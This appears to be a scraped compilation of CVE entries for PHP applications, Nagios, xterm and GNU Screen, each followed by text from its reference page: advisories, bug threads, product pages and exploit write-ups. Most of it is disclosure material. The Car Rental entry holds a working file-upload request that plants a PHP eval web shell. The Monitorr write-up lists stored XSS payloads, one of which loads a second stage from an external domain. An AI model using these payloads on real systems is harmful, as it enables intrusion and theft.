Smarty before 3.1.39 allows a Sandbox Escape because $smarty.template_object can be accessed in sandbox mode.

CVE-2021-26119: smarty/CHANGELOG.md at master · smarty-php/smarty

Smarty before 3.1.39 allows code injection via an unexpected function name after a {function name= substring.

CVE-2021-26120: smarty/CHANGELOG.md at master · smarty-php/smarty

PHPGurukul Car Rental Project version 2.0 suffers from a remote shell upload vulnerability in changeimage1.php.

    # Exploit Title: Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution# Date: 3/2/2021# Exploit Author: Jannick Tiger# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/# Version : V 2.0# Vulnerability Type: Arbitrary File Upload # Tested on Windows 10 、XAMPP# This application is vulnerable to Arbitrary File Upload to Remote Code Execution vulnerability.# Vulnerable script:POST /carrental/admin/changeimage1.php?imgid=4 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------346751171915680139113101061568Content-Length: 369Origin: http://localhostConnection: closeReferer: http://localhost/carrental/admin/changeimage1.php?imgid=4Cookie: PHPSESSID=te82lj6tvep7afns0qm890393eUpgrade-Insecure-Requests: 1-----------------------------346751171915680139113101061568Content-Disposition: form-data; name="img1"; filename="1.php"Content-Type: application/octet-stream<?php @eval($_POST[pp]);?>-----------------------------346751171915680139113101061568Content-Disposition: form-data; name="update"-----------------------------346751171915680139113101061568--# Uploaded Malicious File can be Found in :carrental\admin\img\vehicleimages\1.php# go to http://localhost/carrental/admin/img/vehicleimages/1.php,Execute malicious code via post value phpinfo();

CVE-2021-26809: Car Rental Project 2.0 Shell Upload ≈ Packet Storm

Teachers Record Management System 1.0 is affected by a SQL injection vulnerability in 'searchteacher' POST parameter in search-teacher.php. This vulnerability can be exploited by a remote unauthenticated attacker to leak sensitive information and perform code execution attacks.

**Teachers Record Management System project Intro**

Teacher Record Management system is a web-based technology that will help to search teacher online. Teacher Record Management system is important for person who search good teacher and also used by school to maintain teacher records.

**Project Requirements**

Project Name

Teachers Record Management System

Language Used

PHP5.6, PHP7.x

Database

MySQL 5.x

User Interface Design

HTML, AJAX,JQUERY,JAVASCRIPT

Web Browser

Mozilla, Google Chrome, IE8, OPERA

Software

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Last updates**

**27 May 2022**

**TRMS Project Modules**

In Teachers Record Management System we use PHP and Mysql database. This is the project which keep records of Teachers. Teachers Record Management System has two module **i.e admin and users.**

**Admin Module**

**Dashboard**: In this section admin can briefly view total number of subjects and total number of teachers.

**Subjects**: In this section, admin can manage the Subjects (add/update).

**Teachers**: In this section, admin can add new teachers and manage the details of old teachers.

**Search**: In this section, admin can search teachers by using teacher name.

**Report**: In this section, admin can view number of teachers added  in particular periods.

**Profile**: In this section admin can update his/her profile.

**Change Password**: In this section admin can change his/her own passwords

**Logout**: Through this button admin can logout.

**Forgot Password:** In this section, admin can reset his/her password by using registered email id and contact number.

**Teacher Module**

**Dashboard**: It is the welcome page for a teacher.

**Queries:** In this section, teacher view the queries which is raised by users.

**Profile**: In this section teacher can update his/her profile.

**Change Password**: In this section teacher can change his/her own passwords

**Logout**: Through this button teacher can logout.

 **Note**:  In this project MD5 encryption method used.

**Users**

Users can search the teachers by entering the subject name and raised the queries which is seen by teacher.

**Some Project Screenshots**

**Home Page**

**Teacher Signup**

**Admin Dashboard**

**Add Teachers Page**

****How to run the Teachers Record Management System****(TRMS) Project****

1\. Download the zip file

2\. Extract the file and copy trms folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)

4\. Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with name trms

6\. Import trms.sql file (given inside the zip package in SQL file folder)

7.Run the script http://localhost/trms (frontend)

**Credential for admin panel :**

**Username:** admin  
**Password:** Test@123

**Credential for Teacher panel :**

**Username:** jogoe12@yourdomain.com  
**Password:** Test@123

Or Register a new Teacher.

**View Demo**

**Project Download Link**

**Teachers Record Management  System Project Report & PPT**

CVE-2021-26822: Teachers Record Management System Project using PHP and Mysql- PHPGURUKUL

Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.

**What Can Nagios Help You Do?**

**Windows Monitoring**

**Linux Monitoring**

**Server Monitoring**

**Application Monitoring**

**SNMP Monitoring**

**Log Monitoring**

Nagios XI provides monitoring of all mission-critical infrastructure components including applications, services, operating systems, network protocols, systems metrics, and network infrastructure. Hundreds of third-party addons provide for monitoring of virtually all in-house and external applications, services, and systems.

Nagios Log Server greatly simplifies the process of searching your log data. Set up alerts to notify you when potential threats arise, or simply query your log data to quickly audit any system. With Nagios Log Server, you get all of your log data in one location, with high availability and fail-over built right in. Did we mention no data limits?

Nagios Fusion offers your network a high degree of visibility and scalability, helping solve problems that come with multiple networks and geographical separation. By allowing you to visualize multiple Nagios XI and Core servers in one location, network management becomes simplified by centralization.

**See how we help thousands of companies save money and eliminate downtime**

See more Nagios Case Studies **here**

**EverWatch Global**

Nagios helps e-commerce retail giant reach $125,000,000 in additional sales with to 98% annual uptime.

**Astiostech**

Single-point monitoring and high availability for 2,500+ servers and 5,000+ network devices.

**The University of St. Thomas**

University uses better data to improve purchasing decisions, bandwidth allocation, and reaction to anomalies.

**Petrofac**

Energy solutions giant sees increased capabilities, productivity by deploying Nagios.

Gain extended insight into your network with enterprise-class network monitoring, alerting, and analysis.

**Nagios Network Analyzer  
**

Network traffic, bandwidth monitoring, and flow analysis for your entire IT infrastructure.

**Nagios Log Server  
**

Get the most out of your data. Monitor, manage, visualize, archive, analyze, and alert on all of your log data.

**Nagios Fusion**

Distributed network monitoring made easy. Visualize and manage all of your Nagios monitoring systems from a single screen.

**Ready to Try Nagios?**

You can try any of our solutions free for 30 days with no restrictions. Monitor your entire IT infrastructure, quickly sort log data, or analyze your bandwidth with Nagios. Nagios is helping organizations around the world make better business decisions with proven IT infrastructure monitoring, data collection, and netflow analysis solutions.

CVE-2021-25298: Nagios - Network, Server and Log Monitoring Software

In PHP versions 7.3.x below 7.3.26, 7.4.x below 7.4.14 and 8.0.0, when validating URL with functions like filter_var($url, FILTER_VALIDATE_URL), PHP will accept an URL with invalid password as valid URL. This may lead to functions that rely on URL being valid to mis-parse the URL and produce wrong data as components of the URL.

Sec Bug #77423

FILTER\_VALIDATE\_URL accepts URLs with invalid userinfo

Submitted:

2019-01-07 10:16 UTC

Modified:

2021-02-15 10:28 UTC

From:

jifan dot jf at alibaba-inc dot com

Assigned:

stas (profile)

Status:

Closed

Package:

\*URL Functions

PHP Version:

5.6.39

OS:

linux

Private report:

No

CVE-ID:

2020-7071

**Patches**

Add a Patch

**Pull Requests**

Add a Pull Request

**History**

AllCommentsChangesGit/SVN commitsRelated reports

 **\[2020-02-13 14:37 UTC\] cmb@php.net**

\-Status: Open +Status: Duplicate

 **\[2020-02-13 14:44 UTC\] cmb@php.net**

\-Status: Duplicate +Status: Open

 **\[2020-02-13 16:06 UTC\] cmb@php.net**

\-Assigned To: +Assigned To: stas

 **\[2020-02-13 16:06 UTC\] cmb@php.net**

Given that the documentation of parse\_url()\[1\] states

| This function is not meant to validate the given URL, it only
| breaks it up into the above listed parts. Partial URLs are also
| accepted, parse\_url() tries its best to parse them correctly.

I don't think this qualifies as security issue.  However, given
that filter\_var($a, FILTER\_VALIDATE\_URL) returns the URL (instead
of false), I think there is a security issue in php\_url\_parse\_ex().

A possible fix would be recognize the userinfo only if it is valid
according to RFC 3986\[2\], which could look like
<https://gist.github.com/cmb69/180b63eea1c5163cb29440421007ba4a\>
(this has been developed against PHP-7.4).

Stas, what do you think about this?

\[1\] <https://www.php.net/parse-url\>
\[2\] <https://tools.ietf.org/html/rfc3986#appendix-A\>

 **\[2020-05-11 20:44 UTC\] stas@php.net**

\-Summary: parse\_url() will deliver a wrong host to user +Summary: FILTER\_VALIDATE\_URL accepts URLs with invalid userinfo

 **\[2020-05-11 20:44 UTC\] stas@php.net**

I think if userinfo is invalid FILTER\_VALIDATE\_URL definitely should not accept it.

 **\[2020-05-11 20:45 UTC\] stas@php.net**

We'd probably need a fix for this from 7.1 up.

 **\[2020-05-11 20:47 UTC\] stas@php.net**

Oops, I meant 7.2 of course not 7.1

 **\[2021-01-03 01:48 UTC\] stas@php.net**

\-CVE-ID: +CVE-ID: 2020-7071

 **\[2021-01-04 09:14 UTC\] stas@php.net**

\-Status: Assigned +Status: Closed

 **\[2021-01-27 07:52 UTC\] gkamathe at redhat dot com**

Hello,

Have we considered a case where the input has only "@" within the URL instead of "\\@". A sample use case is below on latest version of PHP, where the hostname being returned is still incorrect (malicious).



$ php -v
PHP 7.4.14 (cli) (built: Jan  5 2021 10:45:06) ( NTS )
Copyright (c) The PHP Group
Zend Engine v3.4.0, Copyright (c) Zend Technologies
    with Zend OPcache v7.4.14, Copyright (c), by Zend Technologies
$ 
$ rpm -qa | grep -i php-7
php-7.4.14-1.fc33.x86\_64
$ 
$ cat test.php 
<?php
	#$a = "http://php.net\\@aliyun.com/aaa.do";
	$a = "http://php.net@aliyun.com/aaa.do";
	var\_dump($a);
	$b = parse\_url($a);
	var\_dump($b);
?>
$ 
$ php -f test.php 
string(32) "http://php.net@aliyun.com/aaa.do"
array(4) {
  \["scheme"\]=>
  string(4) "http"
  \["host"\]=>
  string(10) "aliyun.com"     <<<<<<<<
  \["user"\]=>
  string(7) "php.net"
  \["path"\]=>
  string(7) "/aaa.do"
}
$

 **\[2021-01-27 08:05 UTC\] stas@php.net**

The hostname returned in this case is correct. Also, please don't comment on the issues' page about different issues, it makes it very hard to track things.

 **\[2021-02-01 17:25 UTC\] ryan at association dot drupal dot org**

Was this intended to be merged into the 7.2 branch? I thought that was out of support now?

 **\[2021-02-15 09:29 UTC\] tomasnorre at gmail dot com**

It looks like there is a regression regarding this fix.

https://3v4l.org/hGkQj

The fix is in: 7.3.26, 7.4.14 and 8.0.1 as wanted, but it's gone again in: 7.3.27, 7.4.15 and 8.0.2

 **\[2021-02-15 10:28 UTC\] stas@php.net**

The change to parse\_url was intentionally reversed. The change in filter\_url still there.

 **\[2021-02-15 10:31 UTC\] tomasnorre at gmail dot com**

Thanks for the info.

CVE-2020-7071: FILTER_VALIDATE_URL accepts URLs with invalid userinfo

An open redirect vulnerability exists in the return_page redirection functionality of phpGACL 3.3.7, OpenEMR 5.0.2 and OpenEMR development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce). A specially crafted HTTP request can redirect users to an arbitrary URL. An attacker can provide a crafted URL to trigger this vulnerability.

**Summary**

An open redirect vulnerability exists in the return\_page redirection functionality of phpGACL 3.3.7. A specially crafted HTTP request can redirect users to an arbitrary URL. An attacker can provide a crafted URL to trigger this vulnerability.

**Tested Versions**

OpenEMR 5.0.2  
OpenEMR development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce)  
phpGACL 3.3.7

**Product URLs**

http://phpgacl.sourceforge.net/

**CVSSv3 Score**

6.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

**CWE**

CWE-601 - URL Redirection to Untrusted Site (‘Open Redirect’)

**Details**

phpGACL is a PHP library that allows developers to implement permission systems via a Generic Access Control List.

The latest version of this library has been found to be used in OpenEMR, as such the tests have been performed against an OpenEMR instance.

The file gacl_admin_api.class.php (in OpenEMR this has been renamed to Gacl/GaclAdminApi.php) defines a return_page function that is supposed to be used to redirect an admin user to a specified page:

    function return_page($url="") {
        global $_SERVER, $debug;
    
        if (empty($url) AND !empty($_SERVER[HTTP_REFERER])) {
            $this->debug_text("return_page(): URL not set, using referer!");
            $url = $_SERVER[HTTP_REFERER];
        }
    
        if (!$debug OR $debug==0) {
            header("Location: $url\n\n");             [1]
        } else {
            $this->debug_text("return_page(): URL: $url -- Referer: $_SERVER[HTTP_REFERRER]");
        }
    }
    

At \[1\] we can see that the $url passed as argument is used in the location header without any sanitization.

As an example, one instance where this function is used is in admin/acl_list.php:

    ...
    switch ($_GET['action']) {
        case 'Delete':
            $gacl_api->debug_text('Delete!');
    
            if (is_array ($_GET['delete_acl']) AND !empty($_GET['delete_acl'])) {
                foreach($_GET['delete_acl'] as $id) {
                    $gacl_api->del_acl($id);
                }
            }
    
            //Return page.
            $gacl_api->return_page($_GET['return_page']);   [2]
            break;
    ...
    

The return_page variable is controllable the query string \[2\], meaning that an attacker could supply a malicious link to the phpGACL instance, which eventually will redirect the user to an arbitrary location controlled by the attacker. This can be abused to conduct phishing attacks and steal credentials.

Additionally, the return_page function should either call exit() or die() before returning, otherwise execution would continue, which could result in unexpected behavior.

**Exploit Proof of Concept**

The issue above has been reproduced by testing against OpenEMR, which ships the latest version of phpGACL.

An attacker could send the following link to an admin user to reproduce:

    http://open-erm.dev/gacl/admin/acl_list.php?action=Delete&return_page=http://open-emr.org&site=default
    

Clicking on this link will redirect the user to an arbitrary page (in this example “http://open-emr.org”).

**Timeline**

2020-10-21 - Vendor Disclosure  
2021-01-05 - Vendor Patched  
2021-01-27 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2020-13565: TALOS-2020-1178 || Cisco Talos Intelligence Group

xterm before Patch #366 allows remote attackers to execute arbitrary code or cause a denial of service (segmentation fault) via a crafted UTF-8 combining character sequence.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2021-27135: security - Re: screen crash processing combining characters

Remote code execution in Monitorr v1.7.6m in upload.php allows an unauthorized person to execute arbitrary code on the server-side via an insecure file upload.

Well, we pwned one more piece of software. Who cares? Nah, nobody. Alright, now user “nobody” – see how we did that.

Monitorr 1.7.6:

1.  Was written on PHP, that is a good sign for us attackers.
2.  Has 366 stars on Github.
3.  Designed to do monitoring. We like this kind of software.

**Auth Bypass**

Classical situation – an attacker can access installation panel after the actual installation.

Monitorr/assets/config/\_installation/\_register.php

Create a new user and authorize on behalf of this user.

**Remote Code Execution**

The vulnerable code resides in “upload.php” file. The only check that is done on the uploaded file is getimagesize() function:

This function can be easily bypassed by prepending standard image properties to an executable file. In this example, a payload mimics a GIF image:

After size check is passed, the file is successfully uploaded:

So we can see our PHP code executed:

It’s important to emphasize that no authentication checks are done in the upload.php script.

**Cross-Site Scripting (XSS)**

Two stored XSS have been found on service configuration tab at Monitorr settings page. Despite the length restriction, a malicious actor still can experience a full-feautered XSS attack by loading the second-stage payload from an external short domain like 14.rs .

Form field

Payload

Service URL

“><payload><a href="

Service Title

<embed src=//14.rs>

Service Image

“onerror=”alert(document.location)

Steps to Reproduce  
1\. Log in the application  
2\. Navigate to Service configuration tab  
3\. Enter the payload  
4\. Save changes and observe the javascript alert box triggered at the main Monitorr page.

By the way, session cookies don’t have HttpOnly flag, so we can steal authorization cookies.

**Fix**

Unfortunately, the Monitorr command decided to do not to fix these vulnerabilities. To do not have the same issues – ensure, that your software:

1.  Deletes the installation files right after the installation.
2.  Does input sanitization and output encoding of user input.
3.  Checks file uploads properly.

_LL advises to all the researchers do not break real applications_ _illegally. This fun leads to broken businesses and lives, and, most likely, will not make an attacker really rich._

CVE-2020-28871: Authorization Bypass and Remote Code Execution in Monitorr 1.7.6 – Lyhins' Lab

encoding.c in GNU Screen through 4.8.0 allows remote attackers to cause a denial of service (invalid write access and application crash) or possibly have unspecified other impact via a crafted UTF-8 character sequence.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 9 Feb 2021 16:06:07 -0000 (UTC)
From: Tavis Ormandy <taviso@...il.com>
To: oss-security@...ts.openwall.com
Subject: screen crash processing combining characters

Hello, I noticed someone posted this to the screen-devel list. I can
reproduce it here, just catting the testcase does crash my screen
session.

https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00000.html

(I think it wasn't supposed to be public, but it is, so better it's
visible to security teams)

It looks like it might be exploitable at first glance, I see a crash
here in encoding.c, because i is out of range.

1411   else if (!combchars\[i\])
1412     {
1413       combchars\[i\] = (struct combchar \*)malloc(sizeof(struct combchar));
1414       if (!combchars\[i\])
1415            return;
1416       combchars\[i\]->prev = i;
1417       combchars\[i\]->next = i;
1418     }

Exploitable or not, it would be annoying if someone stuffed this into logfiles
being tailed, or whatever.

Tavis.

-- 
 \_o)            $ lynx lock.cmpxchg8b.com
 /\\\\  \_o)  \_o)  $ finger taviso@....org
\_\\\_V \_( ) \_( )  @taviso

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

Tag

#php